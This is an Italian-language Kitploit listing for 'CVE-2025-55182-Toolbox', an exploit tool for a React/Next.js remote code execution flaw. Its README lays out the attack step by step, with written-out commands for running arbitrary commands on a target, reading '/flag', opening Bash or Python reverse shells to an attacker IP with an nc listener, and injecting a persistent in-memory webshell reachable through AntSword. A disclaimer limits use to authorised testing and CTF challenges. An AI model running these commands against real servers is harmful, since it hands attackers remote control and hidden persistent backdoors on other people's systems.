Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-Toolbox — Strumento di sfruttamento automatizzato per CVE-2025-55182 (RCE in React/Next.js) con esecuzione di comandi, rilevamento delle connessioni in uscita, reverse shell interattiva e iniezione persistente di webshell in memoria per test di penetrazione autorizzati e sfide CTF. | Kitploit
Strumenti/GitHubGitHub/lamaper/cve-2025-55182-toolbox
Meccanismi di PersistenzaExploitSfruttamento di Applicazioni WebPost-ExploitCTFPenetration TestingCommand and ControlRed TeamingSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHublamaper/cve-2025-55182-toolbox

CVE-2025-55182-Toolbox

Strumento di sfruttamento automatizzato per CVE-2025-55182 (RCE in React/Next.js) con esecuzione di comandi, rilevamento delle connessioni in uscita, reverse shell interattiva e iniezione persistente di webshell in memoria per test di penetrazione autorizzati e sfide CTF.

Vedi Repository
18 mesi faNon ancora revisionato

React2Shell: CVE-2025-55182 Strumento di Sfruttamento Completo

Autore: lamaper / BITs2Sys

Versione: 1.0.1

Licenza: MIT

📝 Introduzione allo Strumento

Questo strumento è uno strumento di penetration testing automatizzato specificamente progettato per CVE-2025-55182 (inquinamento della catena prototipale di React Server Components / Next.js che porta a RCE). Lo strumento è progettato per competizioni CTF e progetti di servizi di sicurezza autorizzati, integrando funzionalità come verifica della vulnerabilità, rilevamento della connettività in uscita, shell inversa e iniezione di shell in memoria persistenti.

🚀 Funzionalità Principali

  • Esecuzione comandi con un clic (--cmd) : Utilizza il meccanismo di eccezione NEXT_REDIRECT per restituire con precisione i risultati dell'esecuzione dei comandi codificati in Base64.
  • Rilevamento dello stato di connettività in uscita (--check-outbound) : Testa automaticamente la capacità del target di accedere a DNS, HTTP e ICMP, aiutando a decidere il percorso di attacco.
  • Shell inversa interattiva (--shell) : Include due modalità di shell inversa: Bash e Python3. Supporta l'esecuzione asincrona per evitare che le richieste HTTP vadano in timeout.
  • Shell in memoria persistente (--inject-ms) : Inietta una shell in memoria dirottando il meccanismo di distribuzione degli eventi del http.Server di Node.js, senza lasciare tracce su file, supportando il controllo persistente.
  • Interfaccia di interazione per shell in memoria (--ms-cmd) : Modalità di interazione indipendente dal percorso di attivazione della vulnerabilità. Dopo l'iniezione riuscita, è possibile eseguire comandi direttamente tramite il backdoor.

🛠️ Installazione e Dipendenze

Questo strumento è sviluppato in Python 3 e richiede solo l'installazione della libreria requests.

root@kitploit:~
pip install requests

📖 Guida all'Uso

0. Verificare se la Vulnerabilità Esiste

https://github.com/assetnote/react2shell-scanner è un buon strumento di rilevamento.

1. Esecuzione di Base dei Comandi

Recupera direttamente le informazioni sul target:

root@kitploit:~
python exploit.py --url http://target.com/ --cmd "id"
python exploit.py --url http://target.com/ --cmd "cat /flag"

2. Rilevamento Connettività in Uscita

Prima di tentare una shell inversa, verifica se il target può connettersi a Internet:

root@kitploit:~
python exploit.py --url http://target.com/ --check-outbound

3. Shell Inversa

Modalità Bash:

root@kitploit:~
# Macchina attaccante esegue in ascolto: nc -lvnp 4444
python exploit.py --url http://target.com/ --shell bash --ip <il_tuo_IP> --port 4444

Modalità Python:

root@kitploit:~
python exploit.py --url http://target.com/ --shell python --ip <il_tuo_IP> --port 4444

4. Sfruttamento della Shell in Memoria (Persistente)

Iniezione della shell in memoria:

root@kitploit:~
python exploit.py --url http://target.com/ --inject-ms

Esecuzione di comandi tramite shell in memoria (da usare dopo l'iniezione riuscita):

root@kitploit:~
python exploit.py --url http://target.com/ --ms-cmd "whoami"

Nota: il percorso di default per la shell in memoria è /?pass, attivata tramite invio POST del parametro pwd.

Connessione tramite AntSword (Chinese AntSword) :

Password di connessione: pwd, metodo di connessione: CMDLINUX

⚠️ Dichiarazione di Esclusione di Responsabilità

Questo strumento è destinato esclusivamente a ricerche di sicurezza entro i limiti consentiti dalla legge, competizioni CTF e penetration testing autorizzati. È rigorosamente vietato utilizzarlo per attacchi illegali. Tutte le conseguenze derivanti dall'uso di questo strumento sono a carico dell'utente.


Scarica lo strumento